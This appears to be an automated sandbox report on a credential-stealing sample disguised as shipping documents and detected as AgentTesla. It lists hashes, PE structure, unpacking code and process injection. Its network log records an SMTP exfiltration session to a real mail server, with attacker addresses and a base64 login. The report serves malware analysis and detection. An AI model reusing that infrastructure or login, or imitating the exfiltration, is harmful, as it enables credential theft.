6CO"GH9LN7XKXDGrVFZ.A1F}BJH.KO6.OLGl92NIX5X.:;Y..(B.BJH1Kz....*....o...qE.8.-y.&....Je.@$.?z~..;.,x.Q.$G...EKN5NM1GL@zFr..y7\@B6QBYC\|?....i.m..z..9...d".$DG4VFZ.A1.JBJ.K.6CO.G.9..7X5.G.V.Z...F

C:\Users\user\AppData\Roaming\boqXv\boqXv.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	45984
Entropy (8bit):	6.16795797263964
Encrypted:	false
SSDEEP:	768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
MD5:	9D352BC46709F0CB5EC974633A0C3C94
SHA1:	1969771B2F022F9A86D77AC4D4D239BECDF08D07
SHA-256:	2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
SHA-512:	13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: shipping documents.exe, Detection: malicious, Browse Filename: autorization Letter.exe, Detection: malicious, Browse Filename: rMT103SwiftCopyoFPayment.exe, Detection: malicious, Browse Filename: Shipping Document.exe, Detection: malicious, Browse Filename: COMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exe, Detection: malicious, Browse Filename: DHL- CBJ520818836689.pdf.exe, Detection: malicious, Browse Filename: DHL- CBJ520818836689.exe, Detection: malicious, Browse Filename: Shipping documents.exe, Detection: malicious, Browse Filename: Shipping doc.exe, Detection: malicious, Browse Filename: 80c619d931fa4e5c89fe87aac0b6b143.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........\|...P...........................................r...p(....2.(....(....z..r...p(....(....(......}......{.....s..........0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t........0..(....... ....s$........o%....X..(....-...o&....0...........('......&.........................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1141
Entropy (8bit):	4.442398121585593
Encrypted:	false
SSDEEP:	24:zKLXkhDObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0hDQntKKH1MqJC
MD5:	6FB4D27A716A8851BC0505666E7C7A10
SHA1:	AD2A232C6E709223532C4D1AB892303273D8C814
SHA-256:	1DC36F296CE49BDF1D560B527DB06E1E9791C10263459A67EACE706C6DDCDEAE
SHA-512:	3192095C68C6B7AD94212B7BCA0563F2058BCE00C0C439B90F0E96EA2F029A37C2F2B69487591B494C1BA54697FE891E214582E392127CB8C90AB682E0D81ADB
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	Microsoft (R) .NET Framework Services Installation Utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit):	7.970197836429154
TrID:	Win32 Executable (generic) a (10002005/4) 94.59% AutoIt3 compiled script executable (510682/80) 4.83% UPX compressed Win32 Executable (30571/9) 0.29% Win32 EXE Yoda's Crypter (26571/9) 0.25% Generic Win/DOS Executable (2004/3) 0.02%
File name:	shipping documents.exe
File size:	829'895 bytes
MD5:	c5516ff1d3704bad31059e7d7ca7cfe7
SHA1:	9eed578b0fc8ad2e4083b6b226cc1e3f4a04e42c
SHA256:	fd67c185be66d7cbd57f97cc05892e93e9e134ff930ae479ac17c726c74cd8d6
SHA512:	b5672accd8255ef79570e3db355649bd6472547353d0a89aad2dafe0bc2cc5926d272c4ae988e368cde1acc40abd9fc2f42a60363b10e1a40e29ea6648025196
SSDEEP:	24576:tthEVaPqLIjmzLLzevg1tN39mWwqxWj6I:VEVUcp/n9oWdWj9
TLSH:	AA0533F634947618E87C52F3F69303E2C4806AA5BB794E3B64186503AADE2051DFB71F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

File Icon


Icon Hash:	1733312925935517

Static PE Info

General

Entrypoint:	0x4b8e70
Entrypoint Section:	UPX1
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	890e522b31701e079a367b89393329e6

Entrypoint Preview

Instruction
pushad
mov esi, 00477000h
lea edi, dword ptr [esi-00076000h]
push edi
jmp 00007F067CDF762Dh
nop
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
add ebx, ebx
jne 00007F067CDF7629h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F067CDF760Fh
mov eax, 00000001h
add ebx, ebx
jne 00007F067CDF7629h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
add ebx, ebx
jnc 00007F067CDF762Dh
jne 00007F067CDF764Ah
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F067CDF7641h
dec eax
add ebx, ebx
jne 00007F067CDF7629h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
jmp 00007F067CDF75F6h
add ebx, ebx
jne 00007F067CDF7629h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
jmp 00007F067CDF7674h
xor ecx, ecx
sub eax, 03h
jc 00007F067CDF7633h
shl eax, 08h
mov al, byte ptr [esi]
inc esi
xor eax, FFFFFFFFh
je 00007F067CDF7697h
sar eax, 1
mov ebp, eax
jmp 00007F067CDF762Dh
add ebx, ebx
jne 00007F067CDF7629h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F067CDF75EEh
inc ecx
add ebx, ebx
jne 00007F067CDF7629h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F067CDF75E0h
add ebx, ebx
jne 00007F067CDF7629h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
add ebx, ebx
jnc 00007F067CDF7611h
jne 00007F067CDF762Bh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jnc 00007F067CDF7606h
add ecx, 02h
cmp ebp, FFFFFB00h
adc ecx, 02h
lea edx, dword ptr [edi+ebp]
cmp ebp, FFFFFFFCh
jbe 00007F067CDF7630h
mov al, byte ptr [edx]

Rich Headers

Programming Language:

[ C ] VS2010 SP1 build 40219
[C++] VS2010 SP1 build 40219
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc1038	0x3b0	.rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xba000	0x7038	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0x76000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1	0x77000	0x43000	0x42200	d1248dd07f9600cf0199efb427a3e365	False	0.9920951973062382	, Monaural	7.928941419297798	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xba000	0x8000	0x7400	081e9bf7107c6346fa754a81d71e3c24	False	0.5646214978448276	data	5.907914622258372	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xba5cc	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xba6f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xba824	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xba950	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	Great Britain	0.48109756097560974
RT_ICON	0xbafbc	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	Great Britain	0.5672043010752689
RT_ICON	0xbb2a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	Great Britain	0.6418918918918919
RT_ICON	0xbb3d4	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	Great Britain	0.7044243070362474
RT_ICON	0xbc280	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	Great Britain	0.8077617328519856
RT_ICON	0xbcb2c	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	Great Britain	0.5903179190751445
RT_ICON	0xbd098	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	Great Britain	0.5503112033195021
RT_ICON	0xbf644	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	Great Britain	0.6050656660412758
RT_ICON	0xc06f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	Great Britain	0.7553191489361702
RT_MENU	0xb1b28	0x50	data	English	Great Britain	1.1375
RT_DIALOG	0xb1b78	0xfc	OpenPGP Public Key	English	Great Britain	1.0436507936507937
RT_STRING	0xb1c78	0x530	data	English	Great Britain	1.0082831325301205
RT_STRING	0xb21a8	0x690	data	English	Great Britain	1.006547619047619
RT_STRING	0xb2838	0x4d0	data	English	Great Britain	1.0089285714285714
RT_STRING	0xb2d08	0x5fc	data	English	Great Britain	1.0071801566579635
RT_STRING	0xb3308	0x65c	data	English	Great Britain	1.0067567567567568
RT_STRING	0xb3968	0x388	data	English	Great Britain	1.0121681415929205
RT_STRING	0xb3cf0	0x158	data	English	United States	1.0232558139534884
RT_GROUP_ICON	0xc0b5c	0x84	data	English	Great Britain	0.6439393939393939
RT_GROUP_ICON	0xc0be4	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xc0bfc	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xc0c14	0x14	data	English	Great Britain	1.25
RT_VERSION	0xc0c2c	0x19c	data	English	Great Britain	0.5339805825242718
RT_MANIFEST	0xc0dcc	0x26c	ASCII text, with CRLF line terminators	English	United States	0.5145161290322581

Imports

DLL	Import
KERNEL32.DLL	LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll	GetAce
COMCTL32.dll	ImageList_Remove
COMDLG32.dll	GetSaveFileNameW
GDI32.dll	LineTo
MPR.dll	WNetGetConnectionW
ole32.dll	CoInitialize
OLEAUT32.dll	VariantInit
PSAPI.DLL	EnumProcesses
SHELL32.dll	DragFinish
USER32.dll	GetDC
USERENV.dll	LoadUserProfileW
VERSION.dll	VerQueryValueW
WININET.dll	FtpOpenFileW
WINMM.dll	timeGetTime
WSOCK32.dll	recv

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-27T06:37:59.980284+0200	2030171	ET MALWARE AgentTesla Exfil Via SMTP	1	192.168.2.8	49704	162.214.80.31	587	TCP
2024-09-27T06:37:59.980284+0200	2839723	ETPRO MALWARE Win32/Agent Tesla SMTP Activity	1	192.168.2.8	49704	162.214.80.31	587	TCP
2024-09-27T06:37:59.980284+0200	2840032	ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	1	192.168.2.8	49704	162.214.80.31	587	TCP
2024-09-27T06:38:14.092467+0200	2855245	ETPRO MALWARE Agent Tesla Exfil via SMTP	1	192.168.2.8	49704	162.214.80.31	587	TCP
2024-09-27T06:38:14.092467+0200	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.8	49704	162.214.80.31	587	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 06:38:12.391024113 CEST	49704	587	192.168.2.8	162.214.80.31
Sep 27, 2024 06:38:12.396107912 CEST	587	49704	162.214.80.31	192.168.2.8
Sep 27, 2024 06:38:12.396236897 CEST	49704	587	192.168.2.8	162.214.80.31
Sep 27, 2024 06:38:13.036185026 CEST	587	49704	162.214.80.31	192.168.2.8
Sep 27, 2024 06:38:13.037348032 CEST	49704	587	192.168.2.8	162.214.80.31
Sep 27, 2024 06:38:13.042208910 CEST	587	49704	162.214.80.31	192.168.2.8
Sep 27, 2024 06:38:13.192925930 CEST	587	49704	162.214.80.31	192.168.2.8
Sep 27, 2024 06:38:13.193761110 CEST	49704	587	192.168.2.8	162.214.80.31
Sep 27, 2024 06:38:13.198745012 CEST	587	49704	162.214.80.31	192.168.2.8
Sep 27, 2024 06:38:13.355595112 CEST	587	49704	162.214.80.31	192.168.2.8
Sep 27, 2024 06:38:13.356596947 CEST	49704	587	192.168.2.8	162.214.80.31
Sep 27, 2024 06:38:13.361423016 CEST	587	49704	162.214.80.31	192.168.2.8
Sep 27, 2024 06:38:13.540183067 CEST	587	49704	162.214.80.31	192.168.2.8
Sep 27, 2024 06:38:13.540595055 CEST	49704	587	192.168.2.8	162.214.80.31
Sep 27, 2024 06:38:13.545491934 CEST	587	49704	162.214.80.31	192.168.2.8
Sep 27, 2024 06:38:13.694763899 CEST	587	49704	162.214.80.31	192.168.2.8
Sep 27, 2024 06:38:13.696082115 CEST	49704	587	192.168.2.8	162.214.80.31
Sep 27, 2024 06:38:13.701009035 CEST	587	49704	162.214.80.31	192.168.2.8
Sep 27, 2024 06:38:13.932413101 CEST	587	49704	162.214.80.31	192.168.2.8
Sep 27, 2024 06:38:13.932635069 CEST	49704	587	192.168.2.8	162.214.80.31
Sep 27, 2024 06:38:13.937776089 CEST	587	49704	162.214.80.31	192.168.2.8
Sep 27, 2024 06:38:14.091700077 CEST	587	49704	162.214.80.31	192.168.2.8
Sep 27, 2024 06:38:14.092407942 CEST	49704	587	192.168.2.8	162.214.80.31
Sep 27, 2024 06:38:14.092467070 CEST	49704	587	192.168.2.8	162.214.80.31
Sep 27, 2024 06:38:14.092492104 CEST	49704	587	192.168.2.8	162.214.80.31
Sep 27, 2024 06:38:14.092511892 CEST	49704	587	192.168.2.8	162.214.80.31
Sep 27, 2024 06:38:14.104558945 CEST	587	49704	162.214.80.31	192.168.2.8
Sep 27, 2024 06:38:14.104597092 CEST	587	49704	162.214.80.31	192.168.2.8
Sep 27, 2024 06:38:14.104607105 CEST	587	49704	162.214.80.31	192.168.2.8
Sep 27, 2024 06:38:14.104617119 CEST	587	49704	162.214.80.31	192.168.2.8
Sep 27, 2024 06:38:14.256876945 CEST	587	49704	162.214.80.31	192.168.2.8
Sep 27, 2024 06:38:14.308284998 CEST	49704	587	192.168.2.8	162.214.80.31
Sep 27, 2024 06:39:52.386990070 CEST	49704	587	192.168.2.8	162.214.80.31
Sep 27, 2024 06:39:52.484513998 CEST	587	49704	162.214.80.31	192.168.2.8
Sep 27, 2024 06:39:52.835098028 CEST	587	49704	162.214.80.31	192.168.2.8
Sep 27, 2024 06:39:52.835350990 CEST	587	49704	162.214.80.31	192.168.2.8
Sep 27, 2024 06:39:52.835432053 CEST	49704	587	192.168.2.8	162.214.80.31
Sep 27, 2024 06:39:52.836981058 CEST	49704	587	192.168.2.8	162.214.80.31
Sep 27, 2024 06:39:52.841813087 CEST	587	49704	162.214.80.31	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 06:38:12.372119904 CEST	49223	53	192.168.2.8	1.1.1.1
Sep 27, 2024 06:38:12.383774042 CEST	53	49223	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 27, 2024 06:38:12.372119904 CEST	192.168.2.8	1.1.1.1	0x251a	Standard query (0)	mail.naveentour.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 27, 2024 06:38:12.383774042 CEST	1.1.1.1	192.168.2.8	0x251a	No error (0)	mail.naveentour.com		162.214.80.31	A (IP address)	IN (0x0001)	false

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Sep 27, 2024 06:38:13.036185026 CEST	587	49704	162.214.80.31	192.168.2.8	220-sh011.webhostingservices.com ESMTP Exim 4.96.2 #2 Fri, 27 Sep 2024 10:08:12 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Sep 27, 2024 06:38:13.037348032 CEST	49704	587	192.168.2.8	162.214.80.31	EHLO 258555
Sep 27, 2024 06:38:13.192925930 CEST	587	49704	162.214.80.31	192.168.2.8	250-sh011.webhostingservices.com Hello 258555 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Sep 27, 2024 06:38:13.193761110 CEST	49704	587	192.168.2.8	162.214.80.31	AUTH login YWNjb3VudHNAbmF2ZWVudG91ci5jb20=
Sep 27, 2024 06:38:13.355595112 CEST	587	49704	162.214.80.31	192.168.2.8	334 UGFzc3dvcmQ6
Sep 27, 2024 06:38:13.540183067 CEST	587	49704	162.214.80.31	192.168.2.8	235 Authentication succeeded
Sep 27, 2024 06:38:13.540595055 CEST	49704	587	192.168.2.8	162.214.80.31	MAIL FROM:<accounts@naveentour.com>
Sep 27, 2024 06:38:13.694763899 CEST	587	49704	162.214.80.31	192.168.2.8	250 OK
Sep 27, 2024 06:38:13.696082115 CEST	49704	587	192.168.2.8	162.214.80.31	RCPT TO:<ericsales878@gmail.com>
Sep 27, 2024 06:38:13.932413101 CEST	587	49704	162.214.80.31	192.168.2.8	250 Accepted
Sep 27, 2024 06:38:13.932635069 CEST	49704	587	192.168.2.8	162.214.80.31	DATA
Sep 27, 2024 06:38:14.091700077 CEST	587	49704	162.214.80.31	192.168.2.8	354 Enter message, ending with "." on a line by itself
Sep 27, 2024 06:38:14.092511892 CEST	49704	587	192.168.2.8	162.214.80.31	.
Sep 27, 2024 06:38:14.256876945 CEST	587	49704	162.214.80.31	192.168.2.8	250 OK id=1su2kA-000UoZ-02
Sep 27, 2024 06:39:52.386990070 CEST	49704	587	192.168.2.8	162.214.80.31	QUIT
Sep 27, 2024 06:39:52.835098028 CEST	587	49704	162.214.80.31	192.168.2.8	221 sh011.webhostingservices.com closing connection

Target ID:	0
Start time:	00:38:05
Start date:	27/09/2024
Path:	C:\Users\user\Desktop\shipping documents.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\shipping documents.exe"
Imagebase:	0x400000
File size:	829'895 bytes
MD5 hash:	C5516FF1D3704BAD31059E7D7CA7CFE7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:38:10
Start date:	27/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\shipping documents.exe"
Imagebase:	0xfe0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2696258750.0000000003312000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2696258750.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2696258750.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2696258750.000000000331A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2695267701.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2695267701.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	00:38:22
Start date:	27/09/2024
Path:	C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
Imagebase:	0x90000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	00:38:22
Start date:	27/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	00:38:30
Start date:	27/09/2024
Path:	C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
Imagebase:	0x480000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	00:38:30
Start date:	27/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	12.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	125
Total number of Limit Nodes:	11

Executed Functions

Function 0193A3D8 Relevance: 5.5, Instructions: 5484COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2696032675.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1930000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da808fa7b349e280a8f2b6400c521bce948b5a92a0dc0752d2a44f66f6297341
Instruction ID: 62d82a758e7c3e7c99cf8e058ee7151ff65c94562584743e8d590fbe6a9c5134
Opcode Fuzzy Hash: da808fa7b349e280a8f2b6400c521bce948b5a92a0dc0752d2a44f66f6297341
Instruction Fuzzy Hash: 18C31F31D10B1A8ADB11EF68C89059DF7B1FF99300F55C79AE458B7221EB70AAC5CB81

Function 067F8F18 Relevance: 2.0, Strings: 1, Instructions: 776COMMON

Download Yara Rule

Strings

`, xrefs: 067F96E5

Memory Dump Source

Source File: 00000002.00000002.2698716914.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: d2c8aa6f5dd2e02b6e23130674ec88a480d97fc0d29e70173c4aee582330d6eb
Instruction ID: fe4c4bb23d76c0ab5a0d22707f8731d1a3f7db9e61b39fe33e1a7f5da920f2ba
Opcode Fuzzy Hash: d2c8aa6f5dd2e02b6e23130674ec88a480d97fc0d29e70173c4aee582330d6eb
Instruction Fuzzy Hash: FB523E30E202098FDB64DB68D584BBEB7B6FB89310F10852AE615DB351DB35DD41CB91

Function 067F3288 Relevance: 1.8, Strings: 1, Instructions: 598COMMON

Download Yara Rule

Strings

$, xrefs: 067F3948

Memory Dump Source

Source File: 00000002.00000002.2698716914.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 53e496e05764846127365a613f381e7ae78201a225426b2f121ed5f5b303d558
Instruction ID: 3b96d547d72892e02ed3f4d21a9c59ced6a147329950692680cee204fd8bcf4d
Opcode Fuzzy Hash: 53e496e05764846127365a613f381e7ae78201a225426b2f121ed5f5b303d558
Instruction Fuzzy Hash: 2322BF71E102159BDF64DBA4C480ABEBBB2FF84320F24856ADA15AB341DA35DD81CBD1

Function 067F0040 Relevance: 1.5, Instructions: 1498COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2698716914.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2eb42aae4d111ae0bfa54813e7152924dea4529e1371b45632acf928e7f8da10
Instruction ID: 7d9dc6866b258f6fae08f9886073211c51ef3c8903b9f504abf6a1fff03d2adb
Opcode Fuzzy Hash: 2eb42aae4d111ae0bfa54813e7152924dea4529e1371b45632acf928e7f8da10
Instruction Fuzzy Hash: A5D24930E10205CFDB64DB68C594AADB7B2FF89310F54C5AAD509AB352EB35ED81CB90

Function 01933EB0 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

\VHm, xrefs: 019340FB

Memory Dump Source

Source File: 00000002.00000002.2696032675.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1930000_RegSvcs.jbxd

Similarity

API ID:
String ID: \VHm
API String ID: 0-3272467948
Opcode ID: 80830358dce69924b94419451c9d91a486485438315433c3e86d18ba6cf511c4
Instruction ID: 3a54a63f99ea2ba32be42a15ad017f0d13825ba8a97d8a875cd5499b5004b9c6
Opcode Fuzzy Hash: 80830358dce69924b94419451c9d91a486485438315433c3e86d18ba6cf511c4
